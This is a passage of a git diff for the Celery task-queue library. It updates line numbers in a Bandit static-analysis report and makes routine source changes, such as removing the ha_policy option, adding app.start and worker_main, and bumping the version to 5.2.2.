"test_name": "assert_used"
},
{
- "code": "615 assert fileno_to_outq[proc.outqR_fd] is proc\n616 assert proc.outqR_fd in hub.readers\n617 error('Timed out waiting for UP message from %r', proc)\n",
+ "code": "609 assert fileno_to_outq[proc.outqR_fd] is proc\n610 assert proc.outqR_fd in hub.readers\n611 error('Timed out waiting for UP message from %r', proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 616,
+ "line_number": 610,
"line_range": [
- 616
+ 610
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "636 \n637 assert not isblocking(proc.outq._reader)\n638 \n639 # handle_result_event is called when the processes outqueue is\n640 # readable.\n641 add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd)\n",
+ "code": "630 \n631 assert not isblocking(proc.outq._reader)\n632 \n633 # handle_result_event is called when the processes outqueue is\n634 # readable.\n635 add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 637,
+ "line_number": 631,
"line_range": [
- 637,
- 638,
- 639,
- 640
+ 631,
+ 632,
+ 633,
+ 634
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1090 synq = None\n1091 assert isblocking(inq._reader)\n1092 assert not isblocking(inq._writer)\n",
+ "code": "1088 synq = None\n1089 assert isblocking(inq._reader)\n1090 assert not isblocking(inq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1091,
+ "line_number": 1089,
"line_range": [
- 1091
+ 1089
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1091 assert isblocking(inq._reader)\n1092 assert not isblocking(inq._writer)\n1093 assert not isblocking(outq._reader)\n",
+ "code": "1089 assert isblocking(inq._reader)\n1090 assert not isblocking(inq._writer)\n1091 assert not isblocking(outq._reader)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1092,
+ "line_number": 1090,
"line_range": [
- 1092
+ 1090
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1092 assert not isblocking(inq._writer)\n1093 assert not isblocking(outq._reader)\n1094 assert isblocking(outq._writer)\n",
+ "code": "1090 assert not isblocking(inq._writer)\n1091 assert not isblocking(outq._reader)\n1092 assert isblocking(outq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1093,
+ "line_number": 1091,
"line_range": [
- 1093
+ 1091
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1093 assert not isblocking(outq._reader)\n1094 assert isblocking(outq._writer)\n1095 if self.synack:\n",
+ "code": "1091 assert not isblocking(outq._reader)\n1092 assert isblocking(outq._writer)\n1093 if self.synack:\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1094,
+ "line_number": 1092,
"line_range": [
- 1094
+ 1092
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1096 synq = _SimpleQueue(wnonblock=True)\n1097 assert isblocking(synq._reader)\n1098 assert not isblocking(synq._writer)\n",
+ "code": "1094 synq = _SimpleQueue(wnonblock=True)\n1095 assert isblocking(synq._reader)\n1096 assert not isblocking(synq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1097,
+ "line_number": 1095,
"line_range": [
- 1097
+ 1095
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1097 assert isblocking(synq._reader)\n1098 assert not isblocking(synq._writer)\n1099 return inq, outq, synq\n",
+ "code": "1095 assert isblocking(synq._reader)\n1096 assert not isblocking(synq._writer)\n1097 return inq, outq, synq\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1098,
+ "line_number": 1096,
"line_range": [
- 1098
+ 1096
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1109 return logger.warning('process with pid=%s already exited', pid)\n1110 assert proc.inqW_fd not in self._fileno_to_inq\n1111 assert proc.inqW_fd not in self._all_inqueues\n",
+ "code": "1107 return logger.warning('process with pid=%s already exited', pid)\n1108 assert proc.inqW_fd not in self._fileno_to_inq\n1109 assert proc.inqW_fd not in self._all_inqueues\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1110,
+ "line_number": 1108,
"line_range": [
- 1110
+ 1108
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1110 assert proc.inqW_fd not in self._fileno_to_inq\n1111 assert proc.inqW_fd not in self._all_inqueues\n1112 self._waiting_to_start.discard(proc)\n",
+ "code": "1108 assert proc.inqW_fd not in self._fileno_to_inq\n1109 assert proc.inqW_fd not in self._all_inqueues\n1110 self._waiting_to_start.discard(proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1111,
+ "line_number": 1109,
"line_range": [
- 1111
+ 1109
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1189 \"\"\"Mark new ownership for ``queues`` to update fileno indices.\"\"\"\n1190 assert queues in self._queues\n1191 b = len(self._queues)\n",
+ "code": "1187 \"\"\"Mark new ownership for ``queues`` to update fileno indices.\"\"\"\n1188 assert queues in self._queues\n1189 b = len(self._queues)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1190,
+ "line_number": 1188,
"line_range": [
- 1190
+ 1188
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1192 self._queues[queues] = proc\n1193 assert b == len(self._queues)\n1194 \n",
+ "code": "1190 self._queues[queues] = proc\n1191 assert b == len(self._queues)\n1192 \n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1193,
+ "line_number": 1191,
"line_range": [
- 1193
+ 1191
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1272 pass\n1273 assert len(self._queues) == before\n1274 \n",
+ "code": "1270 pass\n1271 assert len(self._queues) == before\n1272 \n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1273,
+ "line_number": 1271,
"line_range": [
- 1273
+ 1271
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1279 \"\"\"\n1280 assert not proc._is_alive()\n1281 self._waiting_to_start.discard(proc)\n",
+ "code": "1277 \"\"\"\n1278 assert not proc._is_alive()\n1279 self._waiting_to_start.discard(proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1280,
+ "line_number": 1278,
"line_range": [
- 1280
+ 1278
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "81 with allow_join_result():\n82 assert ping.delay().get(timeout=ping_task_timeout) == 'pong'\n83 \n",
+ "code": "85 with allow_join_result():\n86 assert ping.delay().get(timeout=ping_task_timeout) == 'pong'\n87 \n",
"filename": "celery/contrib/testing/worker.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 82,
+ "line_number": 86,
"line_range": [
- 82
+ 86
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "104 if perform_ping_check:\n105 assert 'celery.ping' in app.tasks\n106 # Make sure we can connect to the broker\n",
+ "code": "109 if perform_ping_check:\n110 assert 'celery.ping' in app.tasks\n111 # Make sure we can connect to the broker\n",
"filename": "celery/contrib/testing/worker.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 105,
+ "line_number": 110,
"line_range": [
- 105
+ 110
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "169 return self.win.getkey().upper()\n170 except Exception: # pylint: disable=broad-except\n171 pass\n",
+ "code": "169 return self.win.getkey().upper()\n170 except Exception: # pylint: disable=broad-except\n171 pass\n172 \n",
"filename": "celery/events/cursesmon.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
"line_number": 170,
"line_range": [
- 170
+ 170,
+ 171
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
},
{
- "code": "481 max_groups = os.sysconf('SC_NGROUPS_MAX')\n482 except Exception: # pylint: disable=broad-except\n483 pass\n",
+ "code": "488 max_groups = os.sysconf('SC_NGROUPS_MAX')\n489 except Exception: # pylint: disable=broad-except\n490 pass\n491 try:\n",
"filename": "celery/platforms.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 482,
+ "line_number": 489,
"line_range": [
- 482
+ 489,
+ 490
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
@@ -2386,84 +2330,86 @@
"test_name": "assert_used"
},
{
- "code": "277 # Tasks are rarely, if ever, created at runtime - exec here is fine.\n278 exec(definition, namespace)\n279 result = namespace[name]\n",
+ "code": "332 # Tasks are rarely, if ever, created at runtime - exec here is fine.\n333 exec(definition, namespace)\n334 result = namespace[name]\n",
"filename": "celery/utils/functional.py",
"issue_confidence": "HIGH",
"issue_severity": "MEDIUM",
"issue_text": "Use of exec detected.",
- "line_number": 278,
+ "line_number": 333,
"line_range": [
- 278
+ 333
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b102_exec_used.html",
"test_id": "B102",
"test_name": "exec_used"
},
{
- "code": "15 try:\n16 import cPickle as pickle\n17 except ImportError:\n",
+ "code": "13 try:\n14 import cPickle as pickle\n15 except ImportError:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with cPickle module.",
- "line_number": 16,
+ "line_number": 14,
"line_range": [
- 16
+ 14
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "17 except ImportError:\n18 import pickle # noqa\n19 \n",
+ "code": "15 except ImportError:\n16 import pickle\n17 \n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with pickle module.",
- "line_number": 18,
+ "line_number": 16,
"line_range": [
- 18
+ 16
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "64 loads(dumps(superexc))\n65 except Exception: # pylint: disable=broad-except\n66 pass\n",
+ "code": "62 loads(dumps(superexc))\n63 except Exception: # pylint: disable=broad-except\n64 pass\n65 else:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 65,
+ "line_number": 63,
"line_range": [
- 65
+ 63,
+ 64
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
},
{
- "code": "158 try:\n159 pickle.loads(pickle.dumps(exc))\n160 except Exception: # pylint: disable=broad-except\n",
+ "code": "156 try:\n157 pickle.loads(pickle.dumps(exc))\n158 except Exception: # pylint: disable=broad-except\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "MEDIUM",
"issue_text": "Pickle and modules that wrap it can be unsafe when used to deserialize untrusted data, possible security issue.",
- "line_number": 159,
+ "line_number": 157,
"line_range": [
- 159
+ 157
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_calls.html#b301-pickle",
"test_id": "B301",
"test_name": "blacklist"
},
{
- "code": "159 pickle.loads(pickle.dumps(exc))\n160 except Exception: # pylint: disable=broad-except\n161 pass\n",
+ "code": "157 pickle.loads(pickle.dumps(exc))\n158 except Exception: # pylint: disable=broad-except\n159 pass\n160 else:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 160,
+ "line_number": 158,
"line_range": [
- 160
+ 158,
+ 159
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
@@ -2498,18 +2444,32 @@
"test_name": "assert_used"
},
{
- "code": "335 self.connection.collect()\n336 except Exception: # pylint: disable=broad-except\n337 pass\n",
+ "code": "350 self.connection.collect()\n351 except Exception: # pylint: disable=broad-except\n352 pass\n353 \n",
"filename": "celery/worker/consumer/consumer.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 336,
+ "line_number": 351,
"line_range": [
- 336
+ 351,
+ 352
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
+ },
+ {
+ "code": "7 import platform\n8 import shelve\n9 import sys\n",
+ "filename": "celery/worker/state.py",
+ "issue_confidence": "HIGH",
+ "issue_severity": "LOW",
+ "issue_text": "Consider possible security implications associated with shelve module.",
+ "line_number": 8,
+ "line_range": [
+ 8
+ ],
+ "more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
+ "test_id": "B403",
+ "test_name": "blacklist"
}
]
-}
\ No newline at end of file
diff --git a/celery/__init__.py b/celery/__init__.py
index 9ccaae8874d..19f860fd0d5 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -1,5 +1,5 @@
"""Distributed Task Queue."""
-# :copyright: (c) 2016-20206 Asif Saif Uddin, celery core and individual
+# :copyright: (c) 2016-2026 Asif Saif Uddin, celery core and individual
# contributors, All rights reserved.
# :copyright: (c) 2015-2016 Ask Solem. All rights reserved.
# :copyright: (c) 2012-2014 GoPivotal, Inc., All rights reserved.
@@ -13,11 +13,11 @@
from collections import namedtuple
# Lazy loading
-from . import local # noqa
+from . import local
-SERIES = 'singularity'
+SERIES = 'dawn-chorus'
-__version__ = '5.0.0'
+__version__ = '5.2.2'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
@@ -27,7 +27,7 @@
# -eof meta-
__all__ = (
- 'Celery', 'bugreport', 'shared_task', 'task', 'Task',
+ 'Celery', 'bugreport', 'shared_task', 'Task',
'current_app', 'current_task', 'maybe_signature',
'chain', 'chord', 'chunks', 'group', 'signature',
'xmap', 'xstarmap', 'uuid',
@@ -65,15 +65,15 @@ def debug_import(name, locals=None, globals=None,
STATICA_HACK = True
globals()['kcah_acitats'[::-1].upper()] = False
if STATICA_HACK: # pragma: no cover
- from celery._state import current_app, current_task # noqa
- from celery.app import shared_task # noqa
- from celery.app.base import Celery # noqa
- from celery.app.task import Task # noqa
- from celery.app.utils import bugreport # noqa
+ from celery._state import current_app, current_task
+ from celery.app import shared_task
+ from celery.app.base import Celery
+ from celery.app.task import Task
+ from celery.app.utils import bugreport
from celery.canvas import (chain, chord, chunks, group, # noqa
maybe_signature, signature, subtask, xmap,
xstarmap)
- from celery.utils import uuid # noqa
+ from celery.utils import uuid
# Eventlet/gevent patching must happen before importing
# anything else, so these tools must be at top-level.
@@ -142,7 +142,8 @@ def maybe_patch_concurrency(argv=None, short_opts=None,
# set up eventlet/gevent environments ASAP
from celery import concurrency
- concurrency.get_implementation(pool)
+ if pool in concurrency.get_available_pool_names():
+ concurrency.get_implementation(pool)
# this just creates a new module, that imports stuff on first attribute
@@ -160,7 +161,6 @@ def maybe_patch_concurrency(argv=None, short_opts=None,
],
'celery.utils': ['uuid'],
},
- direct={'task': 'celery.task'},
__package__='celery', __file__=__file__,
__path__=__path__, __doc__=__doc__, __version__=__version__,
__author__=__author__, __contact__=__contact__,
diff --git a/celery/_state.py b/celery/_state.py
index 0e671151685..5d3ed5fc56f 100644
--- a/celery/_state.py
+++ b/celery/_state.py
@@ -109,9 +109,9 @@ def get_current_app():
"""Return the current app."""
raise RuntimeError('USES CURRENT APP')
elif os.environ.get('C_WARN_APP'): # pragma: no cover
- def get_current_app(): # noqa
+ def get_current_app():
import traceback
- print('-- USES CURRENT_APP', file=sys.stderr) # noqa+
+ print('-- USES CURRENT_APP', file=sys.stderr) # +
traceback.print_stack(file=sys.stderr)
return _get_current_app()
else:
@@ -168,12 +168,12 @@ def _app_or_default_trace(app=None): # pragma: no cover
current_process = None
if app is None:
if getattr(_tls, 'current_app', None):
- print('-- RETURNING TO CURRENT APP --') # noqa+
+ print('-- RETURNING TO CURRENT APP --') # +
print_stack()
return _tls.current_app
if not current_process or current_process()._name == 'MainProcess':
raise Exception('DEFAULT APP')
- print('-- RETURNING TO DEFAULT APP --') # noqa+
+ print('-- RETURNING TO DEFAULT APP --') # +
print_stack()
return default_app
return app
diff --git a/celery/app/amqp.py b/celery/app/amqp.py
index 7031bc8b9b6..10747eed93b 100644
--- a/celery/app/amqp.py
+++ b/celery/app/amqp.py
@@ -46,7 +46,6 @@ class Queues(dict):
create_missing (bool): By default any unknown queues will be
added automatically, but if this flag is disabled the occurrence
of unknown queues in `wanted` will raise :exc:`KeyError`.
- ha_policy (Sequence, str): Default HA policy for queues with none set.
max_priority (int): Default x-max-priority for queues with none set.
"""
@@ -55,14 +54,13 @@ class Queues(dict):
_consume_from = None
def __init__(self, queues=None, default_exchange=None,
- create_missing=True, ha_policy=None, autoexchange=None,
+ create_missing=True, autoexchange=None,
max_priority=None, default_routing_key=None):
- dict.__init__(self)
+ super().__init__()
self.aliases = WeakValueDictionary()
self.default_exchange = default_exchange
self.default_routing_key = default_routing_key
self.create_missing = create_missing
- self.ha_policy = ha_policy
self.autoexchange = Exchange if autoexchange is None else autoexchange
self.max_priority = max_priority
if queues is not None and not isinstance(queues, Mapping):
@@ -75,12 +73,12 @@ def __getitem__(self, name):
try:
return self.aliases[name]
except KeyError:
- return dict.__getitem__(self, name)
+ return super().__getitem__(name)
def __setitem__(self, name, queue):
if self.default_exchange and not queue.exchange:
queue.exchange = self.default_exchange
- dict.__setitem__(self, name, queue)
+ super().__setitem__(name, queue)
if queue.alias:
self.aliases[queue.alias] = queue
@@ -122,10 +120,6 @@ def _add(self, queue):
queue.exchange = self.default_exchange
if not queue.routing_key:
queue.routing_key = self.default_routing_key
- if self.ha_policy:
- if queue.queue_arguments is None:
- queue.queue_arguments = {}
- self._set_ha_policy(queue.queue_arguments)
if self.max_priority is not None:
if queue.queue_arguments is None:
queue.queue_arguments = {}
@@ -133,13 +127,6 @@ def _add(self, queue):
self[queue.name] = queue
return queue
- def _set_ha_policy(self, args):
- policy = self.ha_policy
- if isinstance(policy, (list, tuple)):
- return args.update({'ha-mode': 'nodes',
- 'ha-params': list(policy)})
- args['ha-mode'] = policy
-
def _set_max_priority(self, args):
if 'x-max-priority' not in args and self.max_priority is not None:
return args.update({'x-max-priority': self.max_priority})
@@ -251,7 +238,7 @@ def create_task_message(self):
def send_task_message(self):
return self._create_task_sender()
- def Queues(self, queues, create_missing=None, ha_policy=None,
+ def Queues(self, queues, create_missing=None,
autoexchange=None, max_priority=None):
# Create new :class:`Queues` instance, using queue defaults
# from the current configuration.
@@ -259,8 +246,6 @@ def Queues(self, queues, create_missing=None, ha_policy=None,
default_routing_key = conf.task_default_routing_key
if create_missing is None:
create_missing = conf.task_create_missing_queues
- if ha_policy is None:
- ha_policy = conf.task_queue_ha_policy
if max_priority is None:
max_priority = conf.task_queue_max_priority
if not queues and conf.task_default_queue:
@@ -271,7 +256,7 @@ def Queues(self, queues, create_missing=None, ha_policy=None,
else autoexchange)
return self.queues_cls(
queues, self.default_exchange, create_missing,
- ha_policy, autoexchange, max_priority, default_routing_key,
+ autoexchange, max_priority, default_routing_key,
)
def Router(self, queues=None, create_missing=None):
@@ -299,7 +284,7 @@ def as_task_v2(self, task_id, name, args=None, kwargs=None,
time_limit=None, soft_time_limit=None,
create_sent_event=False, root_id=None, parent_id=None,
shadow=None, chain=None, now=None, timezone=None,
- origin=None, argsrepr=None, kwargsrepr=None):
+ origin=None, ignore_result=False, argsrepr=None, kwargsrepr=None):
args = args or ()
kwargs = kwargs or {}
if not isinstance(args, (list, tuple)):
@@ -331,13 +316,6 @@ def as_task_v2(self, task_id, name, args=None, kwargs=None,
if kwargsrepr is None:
kwargsrepr = saferepr(kwargs, self.kwargsrepr_maxsize)
- if callbacks:
- callbacks = [utf8dict(callback) for callback in callbacks]
- if errbacks:
- errbacks = [utf8dict(errback) for errback in errbacks]
- if chord:
- chord = utf8dict(chord)
-
if not root_id: # empty root_id defaults to task_id
root_id = task_id
@@ -357,7 +335,8 @@ def as_task_v2(self, task_id, name, args=None, kwargs=None,
'parent_id': parent_id,
'argsrepr': argsrepr,
'kwargsrepr': kwargsrepr,
- 'origin': origin or anon_nodename()
+ 'origin': origin or anon_nodename(),
+ 'ignore_result': ignore_result,
},
properties={
'correlation_id': task_id,
@@ -410,13 +389,6 @@ def as_task_v1(self, task_id, name, args=None, kwargs=None,
eta = eta and eta.isoformat()
expires = expires and expires.isoformat()
- if callbacks:
- callbacks = [utf8dict(callback) for callback in callbacks]
- if errbacks:
- errbacks = [utf8dict(errback) for errback in errbacks]
- if chord:
- chord = utf8dict(chord)
-
return task_message(
headers={},
properties={
@@ -586,7 +558,7 @@ def queues(self):
"""Queue name⇒ declaration mapping."""
return self.Queues(self.app.conf.task_queues)
- @queues.setter # noqa
+ @queues.setter
def queues(self, queues):
return self.Queues(queues)
diff --git a/celery/app/autoretry.py b/celery/app/autoretry.py
index 21c90e026a2..a5fe700b650 100644
--- a/celery/app/autoretry.py
+++ b/celery/app/autoretry.py
@@ -33,7 +33,7 @@ def run(*args, **kwargs):
try:
return task._orig_run(*args, **kwargs)
except Ignore:
- # If Ignore signal occures task shouldn't be retried,
+ # If Ignore signal occurs task shouldn't be retried,
# even if it suits autoretry_for list
raise
except Retry:
@@ -46,6 +46,15 @@ def run(*args, **kwargs):
retries=task.request.retries,
maximum=retry_backoff_max,
full_jitter=retry_jitter)
- raise task.retry(exc=exc, **retry_kwargs)
+ # Override max_retries
+ if hasattr(task, 'override_max_retries'):
+ retry_kwargs['max_retries'] = getattr(task,
+ 'override_max_retries',
+ task.max_retries)
+ ret = task.retry(exc=exc, **retry_kwargs)
+ # Stop propagation
+ if hasattr(task, 'override_max_retries'):
+ delattr(task, 'override_max_retries')
+ raise ret
task._orig_run, task.run = task.run, run
diff --git a/celery/app/base.py b/celery/app/base.py
index dc7c41d804f..671fc846ac6 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -1,12 +1,14 @@
"""Actual App instance implementation."""
import inspect
import os
+import sys
import threading
import warnings
from collections import UserDict, defaultdict, deque
from datetime import datetime
from operator import attrgetter
+from click.exceptions import Exit
from kombu import pools
from kombu.clocks import LamportClock
from kombu.common import oid_from
@@ -30,7 +32,7 @@
from celery.utils.imports import gen_task_name, instantiate, symbol_by_name
from celery.utils.log import get_logger
from celery.utils.objects import FallbackContext, mro_lookup
-from celery.utils.time import timezone, to_utc
+from celery.utils.time import maybe_make_aware, timezone, to_utc
# Load all builtin tasks
from . import builtins # noqa
@@ -204,6 +206,8 @@ class name.
task_cls = 'celery.app.task:Task'
registry_cls = 'celery.app.registry:TaskRegistry'
+ #: Thread local storage.
+ _local = None
_fixups = None
_pool = None
_conf = None
@@ -227,6 +231,9 @@ def __init__(self, main=None, loader=None, backend=None,
changes=None, config_source=None, fixups=None, task_cls=None,
autofinalize=True, namespace=None, strict_typing=True,
**kwargs):
+
+ self._local = threading.local()
+
self.clock = LamportClock()
self.main = main
self.amqp_cls = amqp or self.amqp_cls
@@ -267,8 +274,10 @@ def __init__(self, main=None, loader=None, backend=None,
self.__autoset('broker_url', broker)
self.__autoset('result_backend', backend)
self.__autoset('include', include)
- self.__autoset('broker_use_ssl', kwargs.get('broker_use_ssl'))
- self.__autoset('redis_backend_use_ssl', kwargs.get('redis_backend_use_ssl'))
+
+ for key, value in kwargs.items():
+ self.__autoset(key, value)
+
self._conf = Settings(
PendingConfiguration(
self._preconf, self._finalize_pending_conf),
@@ -295,6 +304,10 @@ def __init__(self, main=None, loader=None, backend=None,
self.on_after_finalize = Signal(name='app.on_after_finalize')
self.on_after_fork = Signal(name='app.on_after_fork')
+ # Boolean signalling, whether fast_trace_task are enabled.
+ # this attribute is set in celery.worker.trace and checked by celery.worker.request
+ self.use_fast_trace_task = False
+
self.on_init()
_register_app(self)
@@ -310,7 +323,7 @@ def on_init(self):
"""Optional callback called at init."""
def __autoset(self, key, value):
- if value:
+ if value is not None:
self._preconf[key] = value
self._preconf_set_by_auto.add(key)
@@ -342,6 +355,41 @@ def close(self):
self._pool = None
_deregister_app(self)
+ def start(self, argv=None):
+ """Run :program:`celery` using `argv`.
+
+ Uses :data:`sys.argv` if `argv` is not specified.
+ """
+ from celery.bin.celery import celery
+
+ celery.params[0].default = self
+
+ if argv is None:
+ argv = sys.argv
+
+ try:
+ celery.main(args=argv, standalone_mode=False)
+ except Exit as e:
+ return e.exit_code
+ finally:
+ celery.params[0].default = None
+
+ def worker_main(self, argv=None):
+ """Run :program:`celery worker` using `argv`.
+
+ Uses :data:`sys.argv` if `argv` is not specified.
+ """
+ if argv is None:
+ argv = sys.argv
+
+ if 'worker' not in argv:
+ raise ValueError(
+ "The worker sub-command must be specified in argv.\n"
+ "Use app.start() to programmatically start other commands."
+ )
+
+ self.start(argv=argv)
+
def task(self, *args, **opts):
"""Decorator to create a task class out of any callable.
@@ -428,6 +476,7 @@ def _task_from_fun(self, fun, name=None, base=None, bind=False, **options):
'_decorated': True,
'__doc__': fun.__doc__,
'__module__': fun.__module__,
+ '__annotations__': fun.__annotations__,
'__header__': staticmethod(head_from_fun(fun, bound=bind)),
'__wrapped__': run}, **options))()
# for some reason __qualname__ cannot be set in type()
@@ -443,7 +492,7 @@ def _task_from_fun(self, fun, name=None, base=None, bind=False, **options):
task = self._tasks[name]
return task
- def register_task(self, task):
+ def register_task(self, task, **options):
"""Utility for registering a task-based class.
Note:
@@ -456,7 +505,7 @@ def register_task(self, task):
task_cls = type(task)
task.name = self.gen_task_name(
task_cls.__name__, task_cls.__module__)
- add_autoretry_behaviour(task)
+ add_autoretry_behaviour(task, **options)
self.tasks[task.name] = task
task._app = self
task.bind(self)
@@ -648,8 +697,8 @@ def _autodiscover_tasks_from_names(self, packages, related_name):
def _autodiscover_tasks_from_fixups(self, related_name):
return self._autodiscover_tasks_from_names([
pkg for fixup in self._fixups
- for pkg in fixup.autodiscover_tasks()
if hasattr(fixup, 'autodiscover_tasks')
+ for pkg in fixup.autodiscover_tasks()
], related_name=related_name)
def send_task(self, name, args=None, kwargs=None, countdown=None,
@@ -680,9 +729,30 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
'task_always_eager has no effect on send_task',
), stacklevel=2)
- ignored_result = options.pop('ignore_result', False)
+ ignore_result = options.pop('ignore_result', False)
options = router.route(
options, route_name or name, args, kwargs, task_type)
+ if expires is not None:
